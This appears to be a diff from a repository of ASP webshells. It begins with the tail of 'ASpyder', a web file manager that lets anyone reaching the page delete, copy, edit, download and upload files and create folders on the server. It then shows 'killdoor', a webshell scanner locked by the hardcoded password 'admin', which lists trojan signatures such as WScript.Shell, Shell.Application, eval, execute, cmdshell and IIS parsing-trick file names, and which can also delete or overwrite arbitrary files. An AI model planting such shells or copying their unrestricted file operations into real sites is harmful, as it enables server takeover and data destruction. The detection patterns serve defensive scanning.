<tr><td bgcolor=black align=right><A HREF="<%=Request.Servervariables("SCRIPT_NAME")%>?logoff=@&...thankyou.for.using.ASpyder....~sir_shagalot!..[shagzzz.cjb.net]"><font size=-2 face=arial>+++LOGOFF+++</A></td></tr></table>
</td></tr></table>
<p align=center ><Table width=75% bgcolor=#505050 cellpadding=4 ><tr><td>
<form method="post" action="<%=Request.Servervariables("SCRIPT_NAME")%>" ><font face=arial size=-1 >Delete file from current directory:</font><BR>
<select size=1 name=ToDelete >
<option>------------------------------</option>"
<%
fi=0
For each file in folder.Files
Response.Write "<option>" & file.name & "</option>"
fi=fi+1
next
Response.Write "</select><input type=hidden name=txtpath value=""" & MyPath & """><input type=Submit name=cmd value=Delete ></form></td><td>"
Response.Write "<form method=post name=frmCopyFile action=""" & Request.Servervariables("SCRIPT_NAME") & """ ><font face=arial size=-1 >Copy file too current directory:</font><br><select size=1 name=ToCopy >"
Response.Write "<option>------------------------------</option>"
For each file in fileCopy.Files
Response.Write "<option>" & file.name & "</option>"
next
Response.Write "</select><input type=hidden name=txtpath value=""" & MyPath & """><input type=Submit name=cmd value="" Copy "" ></form></td></tr></Table>"
Response.Flush
' ---View Tree Begins Here
Response.Write "<table Cellpading=2 width=75% bgcolor=#505050 ><tr><td valign=top width=50% bgcolor=#303030 >Folders:<BR><BR>"
fo=0
Response.Write "<font face=wingdings color=Gray >0</font> <FONT COLOR=#c8c8c8><span style='cursor: hand;' OnClick=""getit('..')"">..</span></FONT><BR>"
For each fold in folder.SubFolders '-->FOLDERz
fo=fo+1
Response.Write "<font face=wingdings color=Gray >0</font> <FONT COLOR=#eeeeee><span style='cursor: hand;' OnClick=""getit('" & fold.name & "')"">" & fold.name & "</span></FONT><BR>"
Next
%>
<BR><center><form method=post action="<%=Request.Servervariables("SCRIPT_NAME")%>?txtpath=<%=MyPath%>">
<table bgcolor=#505050 cellspacing=4><tr><td>
<font face=arial size=-1 title="Create and Delete folders by entering their names here manually.">Directory:</td></tr>
<tr><td align=right ><input type=text size=20 name=DirName><BR>
<input type=submit name=cmd value=Create><input type=submit name=cmd value=Delete><input type=hidden name=DirStuff value=@>
</tr></td></table></form>
<%
Response.Write "<BR></td><td valign=top width=50% bgcolor=#303030 >Files:<BR><BR>"
Response.Flush
%>
<form method=post name=frmCopySelected action="<%=Request.Servervariables("SCRIPT_NAME")%>?txtpath=<%=MyPath%>">
<%
Response.write "<center><select name=Fname size=" & fi+3 & " style=""background-color: rgb(48,48,48); color: rgb(210,210,210)"">"
For each file in folder.Files '-->FILEz
Response.Write "<option value=""" & file.name & """>&nbsp;&nbsp;" & file.name & " -- [" & Int(file.size/1024)+1 & " kb]</option>"
Next
Response.write "</select>"
Response.write "<br><input type=submit name=cmd value="" Copy ""><input type=submit name=cmd value=""Edit/Create""><input type=submit name=cmd value=Download>"
%>
</form>
<%
Response.Write "<BR></td></tr><tr><td align=center ><B>Listed: " & fo & "</b></td><td align=center ><b>Listed: " & fi & "</b></td></tr></table><BR>"
' ---View Tree Ends Here
' ---Upload Routine starts here
%>
<form method="post" ENCTYPE="multipart/form-data" action="<%=Request.Servervariables("SCRIPT_NAME")%>?upload=@&txtpath=<%=MyPath%>">
<table bgcolor="#505050" cellpadding="8">
<tr>
<td bgcolor=#303030 valign="bottom"><font size=+1 face=wingdings color=Gray >2</font><font face="Arial" size=-2 color="#ff8300"> SELECT FILES TO UPLOAD:<br>
<input TYPE="FILE" SIZE="53" NAME="FILE1"><BR>
<input TYPE="FILE" SIZE="53" NAME="FILE2"><BR>
<input TYPE="FILE" SIZE="53" NAME="FILE3"><BR>
<input TYPE="FILE" SIZE="53" NAME="FILE4"><BR>
<input TYPE="FILE" SIZE="53" NAME="FILE5"><BR>
<input TYPE="FILE" SIZE="53" NAME="FILE6"><BR>
<input TYPE="FILE" SIZE="53" NAME="FILE7"><BR>
<input TYPE="FILE" SIZE="53" NAME="FILE8"><BR>
<input TYPE="FILE" SIZE="53" NAME="FILE9"><BR>
<input TYPE="FILE" SIZE="53" NAME="FILE10"><BR>
<input TYPE="FILE" SIZE="53" NAME="FILE11"><BR>
<input TYPE="FILE" SIZE="53" NAME="FILE12"><BR>
<input TYPE="FILE" SIZE="53" NAME="FILE13"><BR>
<input TYPE="FILE" SIZE="53" NAME="FILE14"><BR>
<input TYPE="FILE" SIZE="53" NAME="FILE15"><BR>
<input TYPE="FILE" SIZE="53" NAME="FILE16"><BR>
<input TYPE="FILE" SIZE="53" NAME="FILE17"><BR>
<input TYPE="FILE" SIZE="53" NAME="FILE18"><BR>
<input TYPE="FILE" SIZE="53" NAME="FILE19"><BR>
<input TYPE="FILE" SIZE="53" NAME="FILE20"><BR>
&nbsp;&nbsp;<input TYPE="submit" VALUE="Upload !" name="Upload" TITLE="If you recieve an error while uploading, then most likely you do not have write access to disk !!">
</font></td>
</tr>
</table>
<BR>
<table bgcolor="#505050" cellpadding="6">
<tr>
<td bgcolor="#000000" valign="bottom"><font face="Arial" size="-2" color=gray>NOTE FOR UPLOAD -
YOU MUST HAVE VBSCRIPT v5.0 INSTALLED ON YOUR WEB SERVER&nbsp; FOR THIS LIBRARY TO
FUNCTION CORRECTLY. YOU CAN OBTAIN IT FREE FROM MICROSOFT WHEN YOU INSTALL INTERNET
EXPLORER 5.0 OR LATER. WHICH IS, MOST LIKELY, ALREADY INSTALLED.</font></td>
</tr>
</table>
</form>
<%
' ---Upload Routine stops here
%>
</font><HR><P align=right><font color=#ff8300><TT>Copyright 2003 Vela iNC.</B></font><BR><font size=1 face=arial>[ System: <%=now%> ]</font></p><BR>
</body></html>

513
asp/cmd.asp.txt Normal file
View file

File diff suppressed because one or more lines are too long

1429
asp/hididi.net.txt Normal file
View file

File diff suppressed because it is too large Load diff

615
asp/killdoor.txt Normal file
View file

@ -0,0 +1,615 @@
<%
Dim Report
PASSWORD="admin" '密码
VERSION="" '
URL=Request.ServerVariables("URL")
FileName=Right(URL,Len(URL)-InStrRev(URL,"/"))
ServerName=Request.Servervariables("SERVER_NAME")
ServerPort=":"&Request.ServerVariables("SERVER_PORT")
WebSiteRoot=Server.MapPath("\")
CurrentlyRoot=Server.MapPath(".")
RQSact=Request.QueryString("act")
RQSFileManager=Request.QueryString("filemanager")
RQSFilePath=Request.QueryString("filepath")
If RQSact="login" Then
If Request.Form("pwd")=PASSWORD Then Session("KOA")=1
End If
Set FSO=Server.CreateObject("Scripting.FileSystemObject")
%>
<style type="text/css">
body,td,th {font-size: 12px;}
.style1 {background-color: #0033CC;}
.style2 {background-color: #FFFFFF; height:30px;}
</style>
<script type="text/javascript">
function setNone(t) {
document.getElementById('koaAsp').style.display='none';
document.getElementById('koaQT').style.display='none';
document.getElementById('koaSF').style.display='none';
document.getElementById(t).style.display='';
}
function setScanMode() {
document.getElementById("scanForm").submit();
document.getElementById('scanButton').disabled=true;
document.getElementById('scanButton').value='扫描中…';
document.getElementById('scanMode').innerHTML='正在扫描中,请耐心等待……';
}
</script>
</head>
<body>
<%If Session("KOA")<>1 Then%>
<div>
<form method="post" action="?act=login">
请输入密码admin:<input name="pwd" type="password" size="15"><input type="submit" name="Submit" value="提交">
</form>
</div>
<%
Else
If RQSact<>"scan" And RQSFileManager="" Then
%>
<form action="?act=scan" method="post" name="form" id="scanForm">
<table cellspacing="1" cellpadding="0" class="style1">
<tr>
<td colspan="2" class="style2"><center><h1>KOA ASP类 WebShell扫描工具</h1></center></td>
</tr>
<tbody id="scanMode" class="style2">
<tr>
<td class="style2">
<b>输入你要检查的路径:</b><input name="path" type="text" value="\" size="30">*<br>
三种填写方法,比如“E:\wwwroot”;填“\”为整个网站;“.”为本文件所在目录
</td>
<td class="style2"><input type="button" value="开始扫描" id="scanButton" onclick="setScanMode();"></td>
</tr>
<tr>
<td colspan="2" class="style2">
请选择扫描方式:
<input name="radiobutton" type="radio" value="koa" onclick="setNone('koaAsp')" checked>查木马(耗资源)
<input name="radiobutton" type="radio" value="qt" onclick="setNone('koaQT')">查找IIS解析漏洞的文件
<input name="radiobutton" type="radio" value="sf" onclick="setNone('koaSF')">搜索符合下面条件的文件
</td>
</tr>
<tr>
<td colspan="2" class="style2">
<b>功能说明</b><br>
<span id="koaAsp">
查找后缀名为asp,asa,cdx,cer,aspx等木马<br>
如果目录下文件过多,容易脚本超时。
</span>
<span id="koaQT" style="display:none">
查找IIS解析漏洞的文件这些文件不一定是木马需要手动查看<br>
比如"D:\WEBROOT\website\hack.asp\a.gif"或<br>
"D:\WEBROOT\website\hack.asp;.gif"一类的文件能查到
</span>
<span id="koaSF" style="display:none">
---------------------- 需将以下内容填写完整 ------------------<br><br>
查找内容:<input name="Search_Content" type="text" size="20"> 要查找的字符串,不填就只进行日期检查<br>
修改日期:<input name="Search_Date" type="text" value="<%=Left(Now(),InStrRev(now(),"-")-1)%>" size="20">* 多个日期用;隔开,任意日期填写<a href="#" onClick="javascript:form.Search_Date.value='ALL'">ALL</a><br>
文件类型:<input name="Search_FileExt" value="*" size="20">* 类型之间用,隔开,*表示所有类型
</span>
</td>
</tr>
</tbody>
<tr>
<td colspan="2" class="style2">版本号:<%=VERSION%> 版权所有:<a href="http://tophack.net/">http://tophack.net/</a> 欢迎传播推广,修改请保留版权。</td>
</tr>
</table>
</form>
<%
ElseIf RQSFileManager<>"" Then
On Error Resume Next
If RQSFileManager="delfile" Then
Call FSO.DeleteFile(RQSFilePath,True)
ChkErr(Err)
Response.Write "<script>alert('删除成功');window.open('','_self','');window.close();</script>"
ElseIf RQSFileManager="savefile" Then
FileContent=Request.Form("fileContent")
Set oFile=FSO.OpenTextFile(RQSFilePath,2,True)
oFile.Write FileContent
oFile.Close
ChkErr(Err)
Response.Write "<script>alert('修改成功');window.open('','_self','');window.close();</script>"
ElseIf RQSFileManager="editfile" Then
Set oFile=FSO.OpenTextFile(RQSFilePath)
ChkErr(Err)
FileTxt=Server.HtmlEncode(oFile.ReadAll())
%>
<table border="1" cellpadding="0" cellspacing="0" style="table-layout:fixed;word-break:break-all;width:100%;">
<tr>
<th>“<%=RQSFilePath%>”文件代码</th>
</tr>
<tr>
<td><a href="?filemanager=delfile&filepath=<%=tURLEncode(RQSFilePath)%>" onClick="return confirm('确认删除?')">删除</a> <a href="#" onClick="if(confirm('确认保存修改?')){document.getElementById('saveForm').submit();}else{return false;}">保存</a> <a href="javascript:window.open('','_self','');window.close();">关闭</a> 友情提示:如果你看到下面的代码是乱码,请不要使用本程序修改文件。</td>
</tr>
<tr>
<td><form action="?filemanager=savefile&filepath=<%=tURLEncode(RQSFilePath)%>" method="post" id="saveForm"><textarea name="fileContent" style="width:1000px;height:530px;"><%=FileTxt%></textarea></form></td>
</tr>
<tr>
<td><a href="?filemanager=delfile&filepath=<%=tURLEncode(RQSFilePath)%>" onClick="return confirm('确认删除?')">删除</a> <a href="#" onClick="if(confirm('确认保存修改?')){document.getElementById('saveForm').submit();}else{return false;}">保存</a> <a href="javascript:window.open('','_self','');window.close();">关闭</a></td>
</tr>
</table>
<%
Else
Set oFile=FSO.OpenTextFile(RQSFilePath)
ChkErr(Err)
FileTxt=Server.HtmlEncode(LCase(oFile.ReadAll()))
%>
<table border="1" cellpadding="0" cellspacing="0" style="table-layout:fixed;word-break:break-all;width:100%">
<tr>
<th>“<%=RQSFilePath%>”文件代码 危险脚本已高亮加大</th>
</tr>
<tr>
<td><a href="?filemanager=delfile&filepath=<%=tURLEncode(RQSFilePath)%>" onClick="return confirm('确认删除?')">删除</a> <a href="?filemanager=editfile&filepath=<%=tURLEncode(RQSFilePath)%>">编辑</a> <a href="javascript:window.open('','_self','');window.close();">关闭</a> 友情提示:如果你看到下面的代码是乱码,请不要使用本程序修改文件。</td>
</tr>
<tr>
<td><%=HeightLightCode(Replace(FileTxt,vbNewLine,"<br/>"))%></td>
</tr>
<tr>
<td><a href="?filemanager=delfile&filepath=<%=tURLEncode(RQSFilePath)%>" onClick="return confirm('确认删除?')">删除</a> <a href="?filemanager=editfile&filepath=<%=tURLEncode(RQSFilePath)%>">编辑</a> <a href="javascript:window.open('','_self','');window.close();">关闭</a></td>
</tr>
</table>
<%
End If
Set oFile=Nothing
Else
Server.ScriptTimeout=9999999
FormRB=Request.Form("radiobutton")
FormPath=Request.Form("path")
FormSD=Request.Form("Search_Date")
FormSFE=Request.Form("Search_FileExt")
If FormPath="" Then
Response.Write("请输入要扫描的目录<br><br><a href='"&URL&"'>返回重新输入</a>")
Response.End
End If
If FormPath="\" Then
TmpPath=WebSiteRoot
SearchType=1
ElseIf FormPath="." Then
TmpPath=CurrentlyRoot
SearchType=2
Else
TmpPath=FormPath
End If
Timer1=Timer
Sun=0
SumFiles=0
SumFolders=1
If FormRB="koa" Then
DimFileExt="asp,asa,cer,cdx,aspx,cgi,php,php3,php4,php5"
Call ShowAllFileKOA(TmpPath)
ElseIf FormRB="qt" Then
Call ShowAllFileQT(TmpPath)
Else
If FormPath="" Or FormSD="" Or FormSFE="" Then
Response.Write("条件不完全,恕难从命<br><br><a href='"&URL&"'>返回重新输入</a>")
Response.End
End If
DimFileExt=FormSFE
Call ShowAllFileSF(TmpPath)
End If
%>
<table width="100%" border="0" cellpadding="0" cellspacing="0">
<tr>
<a href='<%=URL%>'>返回使用其他方式扫描</a><th>WebShell(木马) 扫描结果</th>
</tr>
<tr>
<td style="padding:5px;line-height:170%;clear:both;font-size:12px">
<table width="100%" border="0" cellpadding="0" cellspacing="0">
<tr>
<td valign="top">
<table width="100%" border="1" cellpadding="0" cellspacing="0" style="padding:5px;line-height:170%;clear:both;font-size:12px">
<tr>
<%If FormRB="koa" Then%>
<td width="30%">文件相对路径</td>
<td width="18%">特征码</td>
<td width="40%">描述</td>
<td width="12%">创建/修改时间</td>
<%Else%>
<td width="60%">文件相对路径</td>
<td width="20%">文件创建时间</td>
<td width="20%">修改时间</td>
<%End If%>
</tr>
<%=Report%>
</table>
</td>
</tr>
</table>
</td></tr></table>
扫描完毕!一共检查文件夹<font color="#FF0000"><%=SumFolders%></font>个,文件<font color="#FF0000"><%=SumFiles%></font>个,发现可疑点<font color="#FF0000"><%=Sun%></font>个
<%
Timer2=Timer
TheTime=CStr(Int(((Timer2-Timer1)*10000)+0.5)/10)
Response.Write ",本页执行共用了"&TheTime&"毫秒 <a href='"&URL&"'>返回使用其他方式扫描</a>"
End If
End If
%>
</body>
</html>
<%
'遍历处理path及其子目录所有文件
Sub ShowAllFileKOA(Path)
If Not FSO.FolderExists(Path) Then Exit Sub
Set f=FSO.GetFolder(Path)
Set fc2=f.Files
For Each MyFile In fc2
On Error Resume Next
If LCase(CurrentlyRoot&"\"&FileName)<>Replace(LCase(Path&"\"&MyFile.Name),"\\","\") And CheckExt(FSO.GetExtensionName(Path&"\"&MyFile.Name)) Then
Call ScanFile(Path&"\"&MyFile.Name,"")
SumFiles=SumFiles+1
End If
Next
Set fc=f.SubFolders
For Each f1 In fc
ShowAllFileKOA Path&"\"&f1.Name
SumFolders=SumFolders+1
Next
End Sub
'检测文件
Sub ScanFile(FilePath,InFile)
FilePath=Replace(FilePath,"\\","\")
FileCreateDate=GetDateCreate(FilePath)
FileModifyDate=GetDateModify(FilePath)
If InFile<>"" Then
InFile=Replace(InFile,"\\","\")
If SearchType=1 Or InStr(LCase(InFile),LCase(WebSiteRoot))>0 Then
InFiles="<font color=red>该文件被 "&InFile&" <a href=""http://"&ServerName&ServerPort&"/"&tURLEncode(Replace(Replace(InFile,WebSiteRoot&"\","",1,1,1),"\","/"))&""" target=_blank>访问此页</a> <a href=""?filemanager=showfile&filepath="&tURLEncode(InFile)&""" target=_blank>查看文件代码</a>文件包含执行</font>"
ElseIf SearchType=2 Or InStr(LCase(InFile),LCase(CurrentlyRoot))>0 Then
InFiles="<font color=red>该文件被 "&InFile&" <a href=""http://"&ServerName&ServerPort&Replace(URL,FileName,"")&tURLEncode(Replace(Replace(InFile,CurrentlyRoot&"\","",1,1,1),"\","/"))&""" target=_blank>访问此页</a> <a href=""?filemanager=showfile&filepath="&tURLEncode(InFile)&""" target=_blank>查看文件代码</a>文件包含执行</font>"
Else
InFiles="<font color=red>该文件被 "&InFile&" <a href=""?filemanager=showfile&filepath="&tURLEncode(InFile)&""" target=_blank>查看文件代码</a>文件包含执行</font>"
End If
End If
On Error Resume Next
Set oFile=FSO.OpenTextFile(FilePath)
FileTxt=LCase(oFile.ReadAll())
If Err Then Exit Sub End If
If Len(FileTxt)>0 Then
'特征码检查
FileTxt=vbcrlf&FileTxt
If SearchType=1 Or InStr(LCase(FilePath),LCase(WebSiteRoot))>0 Then
Temp=FilePath&"<br><a href=""http://"&ServerName&ServerPort&"/"&tURLEncode(Replace(Replace(FilePath,WebSiteRoot&"\","",1,1,1),"\","/"))&""" target=_blank>访问此页</a> <a href=""?filemanager=showfile&filepath="&tURLEncode(FilePath)&""" target=_blank>查看文件代码</a>"
ElseIf SearchType=2 Or InStr(LCase(FilePath),LCase(CurrentlyRoot))>0 Then
Temp=FilePath&"<br><a href=""http://"&ServerName&ServerPort&Replace(URL,FileName,"")&tURLEncode(Replace(Replace(FilePath,CurrentlyRoot&"\","",1,1,1),"\","/"))&""" target=_blank>访问此页</a> <a href=""?filemanager=showfile&filepath="&tURLEncode(FilePath)&""" target=_blank>查看文件代码</a>"
Else
Temp=FilePath&"<br><a href=""?filemanager=showfile&filepath="&tURLEncode(FilePath)&""" target=_blank>查看文件代码</a>"
End If
'Check "WScript.Shell"
If InStr(FileTxt,"wscript.shell") Or InStr(FileTxt,"clsid:72c24dd5-d70a-438b-8a42-98424b88afb8") Then
Report=Report&"<tr><td>"&Temp&"</td><td>WScript.Shell 或者 clsid:72C24DD5-D70A-438B-8A42-98424B88AFB8</td><td><font color=red>危险组件一般被ASP木马利用</font>"&InFiles&"</td><td>"&FileCreateDate&"<br>"&FileModifyDate&"</td></tr>"
Sun=Sun+1
End If
'Check "Shell.Application"
If InStr(FileTxt,"shell.application") Or InStr(FileTxt,"clsid:13709620-c279-11ce-a49e-444553540000") Then
Report=Report&"<tr><td>"&Temp&"</td><td>Shell.Application 或者 clsid:13709620-C279-11CE-A49E-444553540000</td><td><font color=red>危险组件一般被ASP木马利用</font>"&InFiles&"</td><td>"&FileCreateDate&"<br>"&FileModifyDate&"</td></tr>"
Sun=Sun+1
End If
'Check .Encode
Set regEx=New RegExp
regEx.IgnoreCase=True
regEx.Global=True
regEx.Pattern="\b(?:vbscript|jscript|javascript).encode\b"
If regEx.Test(FileTxt) Then
Report=Report&"<tr><td>"&Temp&"</td><td>(vbscript|jscript|javascript).Encode</td><td><font color=red>似乎脚本被加密了</font>"&InFiles&"</td><td>"&FileCreateDate&"<br>"&FileModifyDate&"</td></tr>"
Sun=Sun+1
End If
'Check eval backdoor
regEx.Pattern="\bEval\b"
If regEx.Test(FileTxt) Then
Report=Report&"<tr><td>"&Temp&"</td><td>Eval</td><td>eval()函数可以执行任意ASP代码被一些后门利用。其形式一般是eval(X)<br>但是javascript代码中也可以使用有可能是误报。"&InFiles&"</td><td>"&FileCreateDate&"<br>"&FileModifyDate&"</td></tr>"
Sun=Sun+1
End If
'Check execute backdoor
regEx.Pattern="[^.]\bExecute\b"
If regEx.Test(FileTxt) Then
Report=Report&"<tr><td>"&Temp&"</td><td>Execute</td><td><font color=red>execute()函数可以执行任意ASP代码被一些后门利用。其形式一般是execute(X)</font><br>"&InFiles&"</td><td>"&FileCreateDate&"<br>"&FileModifyDate&"</td></tr>"
Sun=Sun+1
End If
'查一句话木马cmdshell
regEx.Pattern="[^.]\bcmdshell\b"
If regEx.Test(FileTxt) Then
Report=Report&"<tr><td>"&Temp&"</td><td>cmdshell</td><td><font color=red>cmdshell</font><br>"&InFiles&"</td><td>"&FileCreateDate&"<br>"&FileModifyDate&"</td></tr>"
Sun=Sun+1
End If
'查一句话木马serv-u
regEx.Pattern="[^.]\bserv-u\b"
If regEx.Test(FileTxt) Then
Report=Report&"<tr><td>"&Temp&"</td><td>serv-u</td><td><font color=red>serv-u提权一般会包含这个字符</font><br>"&InFiles&"</td><td>"&FileCreateDate&"<br>"&FileModifyDate&"</td></tr>"
Sun=Sun+1
End If
'Check .CreateTextFile|.OpenTextFile
regEx.Pattern="\.(?:Open|Create)TextFile\b"
If regEx.Test(FileTxt) Then
Report=Report&"<tr><td>"&Temp&"</td><td><font color=red>.CreateTextFile|.OpenTextFile</font></td><td>使用了FSO的CreateTextFile|OpenTextFile函数读写文件"&InFiles&"</td><td>"&FileCreateDate&"<br>"&FileModifyDate&"</td></tr>"
Sun=Sun+1
End If
'Check .SaveToFile
regEx.Pattern="\.SaveToFile\b"
If regEx.Test(FileTxt) Then
Report=Report&"<tr><td>"&Temp&"</td><td><font color=red>.SaveToFile</font></td><td>使用了Stream的SaveToFile函数写文件"&InFiles&"</td><td>"&FileCreateDate&"<br>"&FileModifyDate&"</td></tr>"
Sun=Sun+1
End If
'Check .Name=
regEx.Pattern="\.Name\s*=\s*(?!=)"
If regEx.Test(FileTxt) Then
Report=Report&"<tr><td>"&Temp&"</td><td><font color=red>.Name</font></td><td>使用了FSO的.GetFile|.GetFolder函数的.Name更改文件或文件夹名称"&InFiles&"</td><td>"&FileCreateDate&"<br>"&FileModifyDate&"</td></tr>"
Sun=Sun+1
End If
If InFile<>"" Then
MyFileExt=LCase(Right(FilePath,Len(FilePath)-InStrRev(FilePath,".")))
If InStr(MyFileExt,"asp")=0 And InStr(MyFileExt,"asa")=0 And InStr(MyFileExt,"cer")=0 And InStr(MyFileExt,"cdx")=0 And InStr(MyFileExt,"inc")=0 And InStr(MyFileExt,"htm")=0 Then
Sun=Sun+1
Report=Report&"<tr><td>"&Temp&"</td><td><font color=red>Include</font></td><td>包含非ASP("&MyFileExt&")文件"&InFiles&"</td><td>"&FileCreateDate&"<br>"&FileModifyDate&"</td></tr>"
End If
End If
'------------------ End ----------------------------
Set regEx=Nothing
'Check include file|virtual
Set regEx=New RegExp
regEx.IgnoreCase=True
regEx.Global=True
regEx.Pattern="<!--[\s ]*#include[\s ]*(?:file|virtual)[\s ]*=[\s ]*(""|')?(.+)\1[\s ]*-->"
Set Matches=regEx.Execute(FileTxt)
For Each Match In Matches
tFile=Trim(Replace(regEx.Replace(Match.Value,"$2"),vbCr,""))
If Not CheckExt(FSO.GetExtensionName(tFile)) Then
Call ScanFile(Mid(FilePath,1,InStrRev(FilePath,"\"))&tFile,FilePath)
SumFiles=SumFiles+1
End If
Next
Set Matches=Nothing
Set regEx=Nothing
'Check Server.Execute|Transfer
Set regEx=New RegExp
regEx.IgnoreCase=True
regEx.Global=True
regEx.Pattern="Server.(?:Execute|Transfer)\s*\(\s*""(.+)"""
Set Matches=regEx.Execute(FileTxt)
For Each Match In Matches
tFile=Trim(regEx.Replace(Match.Value,"$1"))
If Not CheckExt(FSO.GetExtensionName(tFile)) Then
Call ScanFile(Mid(FilePath,1,InStrRev(FilePath,"\"))&tFile,FilePath)
SumFiles=SumFiles+1
End If
Next
Set Matches=Nothing
Set regEx=Nothing
'Check Server.Execute|Transfer
Set regEx=New RegExp
regEx.IgnoreCase=True
regEx.Global=True
regEx.Pattern="Server.(?:Execute|Transfer)\s*\(\s*[^""].+\)"
If regEx.Test(FileTxt) Then
Report=Report&"<tr><td>"&Temp&"</td><td>Server.Execute</td><td><font color=red>不能跟踪检查Server.execute()函数执行的文件。请管理员自行检查</font></td><td>"&FileCreateDate&"<br>"&FileModifyDate&"</td></tr>"
Sun=Sun+1
End If
Set regEx=Nothing
'Check RunatScript
Set regEx=New RegExp
regEx.IgnoreCase=True
regEx.Global=True
regEx.Pattern="<scr"&"ipt[^>]*?runat\s*=\s*(""|')?server\1[\s\S]*?>"
Set Matches=regEx.Execute(FileTxt)
For Each Match In Matches
MatchValue=Trim(Replace(Match.Value,vbNewLine," "))
TmpLake2=Mid(MatchValue,1,InStr(MatchValue,">"))
srcSeek=InStr(1,TmpLake2,"src",1)
If srcSeek>0 Then
srcSeek2=InStr(srcSeek,TmpLake2,"=")
myteststr=Mid(MatchValue,srcSeek,srcSeek2)
For i=1 To 50
Tmp=Mid(TmpLake2,srcSeek2+i,1)
If Tmp<>" " And Tmp<>chr(9) And Tmp<>vbCrLf Then
Exit For
End If
Next
If Tmp="""" Then
TmpName=Mid(TmpLake2,srcSeek2+i+1,InStr(srcSeek2+i+1,TmpLake2,"""")-srcSeek2-i-1)
Else
If InStr(srcSeek2+i+1,TmpLake2," ")>0 Then TmpName=Mid(TmpLake2,srcSeek2+i,InStr(srcSeek2+i+1,TmpLake2," ")-srcSeek2-i) Else TmpName=TmpLake2
If InStr(TmpName,chr(9))>0 Then TmpName=Mid(TmpName,1,InStr(1,TmpName,chr(9))-1)
If InStr(TmpName,vbCrLf)>0 Then TmpName=Mid(TmpName,1,InStr(1,TmpName,vbCrlf)-1)
If InStr(TmpName,">")>0 Then TmpName=Mid(TmpName,1,InStr(1,TmpName,">")-1)
End If
Call ScanFile(Mid(FilePath,1,InStrRev(FilePath,"\"))&TmpName,FilePath)
SumFiles=SumFiles+1
End If
Next
Set Matches=Nothing
Set regEx=Nothing
End If
Set oFile=Nothing
End Sub
'检查文件后缀如果与预定的匹配即返回TRUE
Function CheckExt(FileExt)
If DimFileExt="*" Then CheckExt=True
Ext=Split(DimFileExt,",")
For i=0 To Ubound(Ext)
If LCase(FileExt)=Ext(i) Then
CheckExt=True
Exit Function
End If
Next
End Function
Function GetDateModify(FilePath)
Set f=FSO.GetFile(FilePath)
s=f.DateLastModified
Set f=Nothing
GetDateModify=s
End Function
Function GetDateCreate(FilePath)
Set f=FSO.GetFile(FilePath)
s=f.DateCreated
Set f=Nothing
GetDateCreate=s
End Function
Function tURLEncode(Str)
Temp=Replace(Str,"%","%25")
Temp=Replace(Temp,"#","%23")
Temp=Replace(Temp,"&","%26")
Temp=Replace(Temp,"+","%2B")
tURLEncode=Temp
End Function
Function HeightLightCode(Str)
HLCStr="<span style='color:#F00;background-color:#FF0;font-size:30px;'>"
Set regEx=New RegExp
regEx.IgnoreCase=True
regEx.Global=True
regEx.Pattern="([^.]\bExecute)\b|\b(Eval)\b|(\.Name\s*=\s*(?!=))"
Temp=regEx.replace(Str,HLCStr&"$1$2$3</span>")
Set regEx=Nothing
Temp=Replace(Temp,"wscript.shell",HLCStr&"wscript.shell</span>")
Temp=Replace(Temp,"shell.application",HLCStr&"shell.application</span>")
Temp=Replace(Temp,".encode",HLCStr&".encode</span>")
Temp=Replace(Temp,"cmdshell",HLCStr&"cmdshell</span>")
Temp=Replace(Temp,"serv-u",HLCStr&"serv-u</span>")
Temp=Replace(Temp,".createtextfile",HLCStr&".createtextfile</span>")
Temp=Replace(Temp,".opentextfile",HLCStr&".opentextfile</span>")
Temp=Replace(Temp,".savetofile",HLCStr&".savetofile</span>")
Temp=Replace(Temp,"clsid:f935dc22-1cf0-11d0-adb9-00c04fd58a0b",HLCStr&"clsid:f935dc22-1cf0-11d0-adb9-00c04fd58a0b</span>")
Temp=Replace(Temp,"clsid:13709620-c279-11ce-a49e-444553540000",HLCStr&"clsid:13709620-c279-11ce-a49e-444553540000</span>")
Temp=Replace(Temp,"clsid:0d43fe01-f093-11cf-8940-00a0c9054228",HLCStr&"clsid:0d43fe01-f093-11cf-8940-00a0c9054228</span>")
Temp=Replace(Temp,"clsid:72c24dd5-d70a-438b-8a42-98424b88afb8",HLCStr&"clsid:72c24dd5-d70a-438b-8a42-98424b88afb8</span>")
HeightLightCode=Temp
End Function
Sub ChkErr(Err)
If Err Then
Response.Write"<p>错误:"&Err.Description&"</p><p>错误源:"&Err.Source&"</p>"
Err.Clear
Set oFile=Nothing
Set FSO=Nothing
Response.End
End If
End Sub
Sub ShowAllFileSF(Path)
If Not FSO.FolderExists(Path) Then Exit Sub
Set f=FSO.GetFolder(Path)
Set fc2=f.Files
For Each MyFile In fc2
On Error Resume Next
If LCase(CurrentlyRoot&"\"&FileName)<>Replace(LCase(Path&"\"&MyFile.Name),"\\","\") And CheckExt(FSO.GetExtensionName(Path&"\"&MyFile.Name)) Then
Call IsFind(Path&"\"&MyFile.Name)
SumFiles=SumFiles+1
End If
Next
Set fc=f.SubFolders
For Each f1 In fc
ShowAllFileSF Path&"\"&f1.Name
SumFolders=SumFolders+1
Next
Set fc=Nothing
Set fc2=Nothing
Set f=Nothing
End Sub
Sub IsFind(ThePath)
TheDate=GetDateModify(ThePath)
On Error Resume Next
TheTmp=Mid(TheDate,1,InStr(TheDate," ")-1)
If Err Then Exit Sub
xDate=Split(FormSD,";")
If FormSD="ALL" Then ALLTime=True
For i=0 To Ubound(xDate)
If InStr(TheTmp,xDate(i))>0 Or ALLTime=True Then
If SearchType=1 Or InStr(Replace(LCase(ThePath),"\\","\"),LCase(WebSiteRoot))>0 Then
Temp=ThePath&"<br><a href=""http://"&ServerName&ServerPort&"/"&tURLEncode(Replace(Replace(Replace(ThePath,"\\","\"),WebSiteRoot&"\","",1,1,1),"\","/"))&""" target=_blank>访问此页</a> <a href=""?filemanager=showfile&filepath="&tURLEncode(ThePath)&""" target=_blank>查看文件代码</a>"
ElseIf SearchType=2 Or InStr(Replace(LCase(ThePath),"\\","\"),LCase(CurrentlyRoot))>0 Then
Temp=ThePath&"<br><a href=""http://"&ServerName&ServerPort&Replace(URL,FileName,"")&tURLEncode(Replace(Replace(Replace(ThePath,"\\","\"),CurrentlyRoot&"\","",1,1,1),"\","/"))&""" target=_blank>访问此页</a> <a href=""?filemanager=showfile&filepath="&tURLEncode(ThePath)&""" target=_blank>查看文件代码</a>"
Else
Temp=ThePath&"<br><a href=""?filemanager=showfile&filepath="&tURLEncode(ThePath)&""" target=_blank>查看文件代码</a>"
End If
If Request.Form("Search_Content")<>"" Then
Set oFile=FSO.OpenTextFile(ThePath,1,false,-2)
